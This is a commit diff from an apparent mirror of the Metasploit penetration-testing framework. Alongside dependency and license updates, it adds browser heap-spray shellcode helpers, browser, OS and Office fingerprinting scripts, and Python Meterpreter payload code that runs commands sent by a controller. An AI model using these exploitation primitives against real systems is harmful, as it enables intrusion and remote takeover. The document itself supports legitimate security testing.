infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/rapid7/metasploit-framework

bug/bundler_fix
Geyslan G. Bem 2013-11-11 14:29:19 -03:00
parent 030fbba539 62102dd1f9
commit e3641158d9
2487 changed files with 15432 additions and 11452 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.mailmap
View File

@ -7,6 +7,7 @@ hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
joev-r7 <joev-r7@github> joev <joev@metasploit.com>
joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>

2
.rspec
View File

@ -1,2 +1,2 @@
--color
--format documentation
--format Fivemat

2
Gemfile
View File

@ -40,6 +40,8 @@ group :development, :test do
# Version 4.1.0 or newer is needed to support generate calls without the
# 'FactoryGirl.' in factory definitions syntax.
gem 'factory_girl', '>= 4.1.0'
# Make rspec output shorter and more useful
gem 'fivemat', '1.2.1'
# running documentation generation tasks and rspec tasks
gem 'rake', '>= 10.0.0'
end

2
Gemfile.lock
View File

@ -18,6 +18,7 @@ GEM
diff-lcs (1.2.4)
factory_girl (4.2.0)
activesupport (>= 3.0.0)
fivemat (1.2.1)
i18n (0.6.5)
json (1.8.0)
metasploit_data_models (0.16.6)
@ -62,6 +63,7 @@ DEPENDENCIES
activesupport (>= 3.0.0)
database_cleaner
factory_girl (>= 4.1.0)
fivemat (= 1.2.1)
json
metasploit_data_models (~> 0.16.6)
msgpack

347
LICENSE
View File

@ -12,7 +12,7 @@ License: BSD-3-clause
#
# This license does not apply to third-party components detailed below.
#
# Last updated: 2013-Mar-25
# Last updated: 2013-Nov-04
#
Files: data/john/*
@ -166,230 +166,6 @@ Files: lib/fastlib.rb
Copyright: 2011, Rapid7 Inc.
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/eventmachine-*/*
Copyright: 2006-2007, Francis Cianfrocca
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/json-*/*
Copyright: Daniel Luz <dev at mernen dot com>
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/msgpack-*/*
Copyright: Austin Ziegler
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/nokogiri-*/*
Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
License: MIT
Files: lib/gemcache/ruby/1.9.1/arch/*/pg-*/*
Copyright: 1997-2012 by the authors
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/thin-*/*
Copyright: Marc-Andre Cournoyer
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/win32-api-*/*
Copyright: 2003-2011, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/win32-service-*/*
Copyright: 2003-2011, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/windows-api-*/*
Copyright: 2007-2012, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/windows-pr-*/*
Copyright: 2006-2010, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
Copyright: 2006-2011, murphy (Kornelius Kalnback) <murphy rubychan de>
License: LGPL-2.1
Files: lib/gemcache/ruby/1.9.1/gems/actionmailer-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/actionpack-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activemodel-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activerecord-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activeresource-*/*
Copyright: 2006-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activesupport-*/*
Copyright: 2005-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/acts_as_list-*/*
Copyright: 2007 David Heinemeir Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/arel-*/*
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/authlogic-*/*
Copyright: 2011 Ben Johnson of Binary Logic
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/builder-*/*
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/carrierwave-*/*
Copyright: 2008-2012 Jonas Nicklas
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/chunky_png-*/*
Copyright: 2010 Willem van Bergen
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
Copyright: Rob Aldred
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/daemons-*/*
Copyright: 2005-2012 Thomas Uehlinger
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/diff-lcs-*/*
Copyright: 2004-2011 Austin Ziegler
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/erubis-*/*
Copyright: 2006-2011 kuwata-lab.com all rights reserved
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/formtastic-*/*
Copyright: 2008-2010
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/fssm-*/*
Copyright: 2011 Travis Tilley
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/hike-*/*
Copyright: 2011 Sam Stephenson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/i18n-*/*
Copyright: 2008 The Ruby I18n team
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/ice_cube-*/*
Copyright: 2010-2012 John Crepezzi
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/journey-*/*
Copyright: 2011 Aaron Patternson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/jquery-rails-*/*
Copyright: 2010 Andre Arko
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/liquid-*/*
Copyright: 2005, 2006 Tobias Luetke
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/mail-*/*
Copyright: 2009, 2010, 2011, 2012 Mikel Lindsaar
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/metasploit_data_modules-*/*
Copyright: 2012 Rapid7, Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/method_source-*/*
Copyright: 2011 John Mair (banisterfiend)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/multi_json-*/*
Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/polyglot-*/*
Copyright: 2007 Clifford Heath
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/prototype_legacy_helper-*/*
Copyright: No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-*/*
Copyright: 2007-2010 Christian Neukirchen <purl.org/net/chneukirchen>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-cache-*/*
Copyright: 2008 Ryan Tomayko <http://tomayko.com/about>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-ssl-*/*
Copyright: 2010 Joshua Peek
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-test-*/*
Copyright: 2008-2009 Bryan Helmkamp, Engine Yard Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/railties-*/*
Copyright: No copyright statement provided
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rake-*/*
Copyright: 2003, 2004 Jim Weirich
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/robots-*/*
Copyright: 2008 Kyle Maxwell, contributors
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/slop-*/*
Copyright: 2012 Lee Jarvis
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/spork-*/*
Copyright: 2009 Tim Harper
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/sprockets-*/*
Copyright: 2011 Sam Stephenson, Joshua Peek
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/state_machine-*/*
Copyright: 2006-2012 Aaron Pfeifer
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/thor-*/*
Copyright: 2008 Yehuda Katz
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/tilt-*/*
Copyright: 2010 Ryan Tomayko <http://tomayko.com/about>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/treetop-*/*
Copyright: 2007 Nathan Sobo
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/tzinfo-*/*
Copyright: 2005-2006 Philip Ross
License: MIT
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
Copyright: 2006-2010 Yoann GUILLOT
License: LGPL-2.1
@ -454,6 +230,127 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
License: BSD-3-clause
#
# Gems
#
Files: activemodel
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: activerecord
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: activesupport
Copyright: 2005-2011 David Heinemeier Hansson
License: MIT
Files: arel
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
License: MIT
Files: builder
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
License: MIT
Files: database_cleaner
Copyright: 2009 Ben Mabey
License: MIT
Files: diff-lcs
Copyright: 2004-2011 Austin Ziegler
License: MIT
Files: factory_girl
Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
License: MIT
Files: fivemat
Copyright: 2012 Tim Pope
License: MIT
Files: i18n
Copyright: 2008 The Ruby I18n team
License: MIT
Files: json
Copyright: Daniel Luz <dev at mernen dot com>
License: Ruby
Files: metasploit_data_models
Copyright: 2012 Rapid7, Inc.
License: MIT
Files: mini_portile
Copyright: 2011 Luis Lavena
License: MIT
Files: msgpack
Copyright: Austin Ziegler
License: Ruby
Files: multi_json
Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
License: MIT
Files: network_interface
Copyright: 2012, Rapid7, Inc.
License: MIT
Files: nokogiri
Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
License: MIT
Files: packetfu
Copyright: 2008-2012 Tod Beardsley
License: BSD-3-clause
Files: pcaprub
Copyright: 2007-2008, Alastair Houghton
License: LGPL-2.1
Files: pg
Copyright: 1997-2012 by the authors
License: Ruby
Files: rake
Copyright: 2003, 2004 Jim Weirich
License: MIT
Files: redcarpet
Copyright: 2009 Natacha Porté
License: MIT
Files: robots
Copyright: 2008 Kyle Maxwell, contributors
License: MIT
Files: rspec
Copyright: 2009 Chad Humphries, David Chelimsky
License: MIT
Files: shoulda-matchers
Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
License: MIT
Files: simplecov
Copyright: 2010-2012 Christoph Olszowka
License: MIT
Files: timecop
Copyright: 2012 Travis Jeffery, John Trupiano
License: MIT
Files: tzinfo
Copyright: 2005-2006 Philip Ross
License: MIT
Files: yard
Copyright: 2007-2013 Loren Segal
License: MIT
License: BSD-2-clause
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

51
data/js/detect/addons.js Normal file
View File

@ -0,0 +1,51 @@
window.addons_detect = { };
/**
* Returns the version of Microsoft Office. If not found, returns null.
**/
window.addons_detect.getMsOfficeVersion = function () {
var version;
var types = new Array();
for (var i=1; i <= 5; i++) {
try {
types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
}
catch (e) {
types[i-1] = null;
}
}
if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == 'object' && types[4] == 'object')
{
version = "2012";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == 'object' && types[4] == null)
{
version = "2010";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == null && types[4] == null)
{
version = "2007";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
types[3] == null && types[4] == null)
{
version = "2003";
}
else if (types[0] == 'object' && types[1] == null && types[2] == null &&
types[3] == null && types[4] == null)
{
// If run for the first time, you must manullay allow the "Microsoft Office XP"
// add-on to run. However, this prompt won't show because the ActiveXObject statement
// is wrapped in an exception handler.
version = "xp";
}
else {
version = null;
}
return version;
}

39
lib/rex/exploitation/javascriptosdetect.js → data/js/detect/os.js
View File

@ -52,6 +52,13 @@ window.os_detect.getVersion = function(){
return d.style[propCamelCase] === css;
}
var input_type_is_valid = function(input_type) {
if (!document.createElement) return false;
var input = document.createElement('input');
input.setAttribute('type', input_type);
return input.type == input_type;
}
//--
// Client
//--
@ -203,32 +210,42 @@ window.os_detect.getVersion = function(){
// Thanks to developer.mozilla.org "Firefox for developers" series for most
// of these.
// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
if ('HTMLTimeElement' in window) {
ua_version = '22.0'
if (css_is_valid('background-attachment',
'backgroundAttachment',
'local')) {
ua_version = '25.0';
} else if ('DeviceStorage' in window && window.DeviceStorage &&
'default' in window.DeviceStorage.prototype) {
// https://bugzilla.mozilla.org/show_bug.cgi?id=874213
ua_version = '24.0';
} else if (input_type_is_valid('range')) {
ua_version = '23.0';
} else if ('HTMLTimeElement' in window) {
ua_version = '22.0';
} else if ('createElement' in document &&
document.createElement('main') &&
document.createElement('main').constructor === window['HTMLElement']) {
ua_version = '21.0'
ua_version = '21.0';
} else if ('imul' in Math) {
ua_version = '20.0'
ua_version = '20.0';
} else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
ua_version = '19.0'
ua_version = '19.0';
} else if ('devicePixelRatio' in window) {
ua_version = '18.0'
ua_version = '18.0';
} else if ('createElement' in document &&
document.createElement('iframe') &&
'sandbox' in document.createElement('iframe')) {
ua_version = '17.0'
ua_version = '17.0';
} else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
ua_version = '16.0'
ua_version = '16.0';
} else if ('HTMLSourceElement' in window &&
HTMLSourceElement.prototype &&
'media' in HTMLSourceElement.prototype) {
ua_version = '15.0'
ua_version = '15.0';
} else if ('mozRequestPointerLock' in document.body) {
ua_version = '14.0'
ua_version = '14.0';
} else if ('Map' in window) {
ua_version = "13.0"
ua_version = "13.0";
} else if ('mozConnection' in navigator) {
ua_version = "12.0";
} else if ('mozVibrate' in navigator) {

17
data/js/memory/heap_spray.js Normal file
View File

@ -0,0 +1,17 @@
var memory = new Array();
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) {
memory[index] = retSlide + shellcode;
}
}

31
data/js/memory/mstime_malloc.js Normal file
View File

@ -0,0 +1,31 @@
function mstime_malloc(oArg) {
var shellcode = oArg.shellcode;
var offset = oArg.offset;
var heapBlockSize = oArg.heapBlockSize;
var objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0; }
if (heapBlockSize == undefined) { throw "Size must be defined"; }
var buf = "";
for (var i=0; i < heapBlockSize/4; i++) {
if (i == offset) {
if (i == 0) { buf += shellcode; }
else { buf += ";" + shellcode; }
}
else {
buf += ";#W00TA";
}
}
var e = document.getElementById(objId);
if (e == null) {
var eleId = "W00TB"
var acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
document.body.innerHTML = document.body.innerHTML + acTag;
e = document.getElementById(eleId);
}
try { e.values = buf; }
catch (e) {}
}

38
data/js/memory/property_spray.js Normal file
View File

@ -0,0 +1,38 @@
var sym_div_container;
function sprayHeap( oArg ) {
var shellcode = oArg.shellcode;
var offset = oArg.offset;
var heapBlockSize = oArg.heapBlockSize;
var maxAllocs = oArg.maxAllocs;
var objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0x00; }
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
if (maxAllocs == undefined) { maxAllocs = 0x350; }
if (offset > 0x800) { throw "Bad alignment"; }
sym_div_container = document.getElementById(objId);
if (sym_div_container == null) {
sym_div_container = document.createElement("div");
}
sym_div_container.style.cssText = "display:none";
var data;
junk = unescape("%u2020%u2020");
while (junk.length < offset+0x1000) junk += junk;
data = junk.substring(0,offset) + shellcode;
data += junk.substring(0,0x800-offset-shellcode.length);
while (data.length < heapBlockSize) data += data;
for (var i = 0; i < maxAllocs; i++)
{
var obj = document.createElement("button");
obj.title = data.substring(0, (heapBlockSize-2)/2);
sym_div_container.appendChild(obj);
}
}

27
data/js/network/ajax_download.js Normal file
View File

@ -0,0 +1,27 @@
function ajax_download(oArg) {
var method = oArg.method;
var path = oArg.path;
var data = oArg.data;
if (method == undefined) { method = "GET"; }
if (method == path) { throw "Missing parameter 'path'"; }
if (data == undefined) { data = null; }
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest();
}
else {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open(method, path, false);
xmlHttp.send(data);
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
return xmlHttp.responseText;
}
return null;
}

126
data/js/utils/base64.js Normal file
View File

@ -0,0 +1,126 @@
// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
// variable names changed to make obfuscation easier
var Base64 = {
// private property
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
// private method
_utf8_encode : function ( input ){
input = input.replace(/\r\n/g,"\\n");
var utftext = "";
var input_idx;
for (input_idx = 0; input_idx < input.length; input_idx++) {
var chr = input.charCodeAt(input_idx);
if (chr < 128) {
utftext += String.fromCharCode(chr);
}
else if((chr > 127) && (chr < 2048)) {
utftext += String.fromCharCode((chr >> 6) | 192);
utftext += String.fromCharCode((chr & 63) | 128);
} else {
utftext += String.fromCharCode((chr >> 12) | 224);
utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
utftext += String.fromCharCode((chr & 63) | 128);
}
}
return utftext;
},
// public method for encoding
encode : function( input ) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var input_idx = 0;
input = Base64._utf8_encode(input);
while (input_idx < input.length) {
chr1 = input.charCodeAt( input_idx++ );
chr2 = input.charCodeAt( input_idx++ );
chr3 = input.charCodeAt( input_idx++ );
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
}
return output;
},
// public method for decoding
decode : function (input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
while (i < input.length) {
enc1 = this._keyStr.indexOf(input.charAt(i++));
enc2 = this._keyStr.indexOf(input.charAt(i++));
enc3 = this._keyStr.indexOf(input.charAt(i++));
enc4 = this._keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = Base64._utf8_decode(output);
return output;
},
_utf8_decode : function (utftext) {
var string = "";
var input_idx = 0;
var chr1 = 0;
var chr2 = 0;
var chr3 = 0;
while ( input_idx < utftext.length ) {
chr1 = utftext.charCodeAt(input_idx);
if (chr1 < 128) {
string += String.fromCharCode(chr1);
input_idx++;
}
else if((chr1 > 191) && (chr1 < 224)) {
chr2 = utftext.charCodeAt(input_idx+1);
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
input_idx += 2;
} else {
chr2 = utftext.charCodeAt(input_idx+1);
chr3 = utftext.charCodeAt(input_idx+2);
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
input_idx += 3;
}
}
return string;
}
};

BIN
data/meterpreter/common.lib Executable file
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_networkpug.lso
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.lso
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.lso
View File

Binary file not shown.

67
data/meterpreter/ext_server_stdapi.py
View File

@ -149,6 +149,8 @@ TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
# Socket
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
@ -273,6 +275,9 @@ ERROR_FAILURE = 1
# errors.
ERROR_CONNECTION_ERROR = 10000
WIN_AF_INET = 2
WIN_AF_INET6 = 23
def get_stat_buffer(path):
si = os.stat(path)
rdev = 0
@ -290,6 +295,27 @@ def get_stat_buffer(path):
st_buf += struct.pack('<II', blksize, blocks)
return st_buf
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
def resolve_host(hostname, family):
address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
family = address_info[0]
address = address_info[4][0]
return {'family':family, 'address':address, 'packed_address':inet_pton(family, address)}
def windll_GetNativeSystemInfo():
if not has_windll:
return None
@ -687,6 +713,40 @@ def stdapi_fs_stat(request, response):
response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_resolve_host(request, response):
hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
result = resolve_host(hostname, family)
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_resolve_hosts(request, response):
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
for hostname in packet_enum_tlvs(request, TLV_TYPE_HOST_NAME):
hostname = hostname['value']
try:
result = resolve_host(hostname, family)
except socket.error:
result = {'family':family, 'packed_address':''}
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_socket_tcp_shutdown(request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
@ -842,9 +902,12 @@ def stdapi_registry_query_value(request, response):
if value_type.value == REG_SZ:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
elif value_type.value == REG_DWORD:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:4])
value = value_data[:4]
value.reverse()
value = ''.join(map(chr, value))
response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
else:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:value_data_sz.value])
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
return ERROR_SUCCESS, response
return ERROR_FAILURE, response

BIN
data/meterpreter/ext_server_stdapi.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x86.dll
View File

Binary file not shown.

20
data/meterpreter/meterpreter.py
View File

@ -111,6 +111,24 @@ def packet_get_tlv(pkt, tlv_type):
offset += tlv[0]
return {}
def packet_enum_tlvs(pkt, tlv_type = None):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset+8])
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = val.split('\x00', 1)[0]
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type':tlv[1], 'length':tlv[0], 'value':val}
offset += tlv[0]
raise StopIteration()
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
@ -271,7 +289,7 @@ class PythonMeterpreter(object):
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE
preloadlib_methods = self.extension_functions.keys()
i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
i = code.InteractiveInterpreter({'meterpreter':self, 'packet_enum_tlvs':packet_enum_tlvs, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
i.runcode(compile(data_tlv['value'], '', 'exec'))
postloadlib_methods = self.extension_functions.keys()
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)

BIN
data/meterpreter/metsrv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/msflinker_linux_x86.bin
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x86.dll
View File

Binary file not shown.

4
data/ropdb/hxds.xml
View File

@ -11,7 +11,7 @@
<gadget offset="0x0001803c">POP EBP # RETN</gadget>
<gadget offset="0x0001803c">skip 4 bytes</gadget>
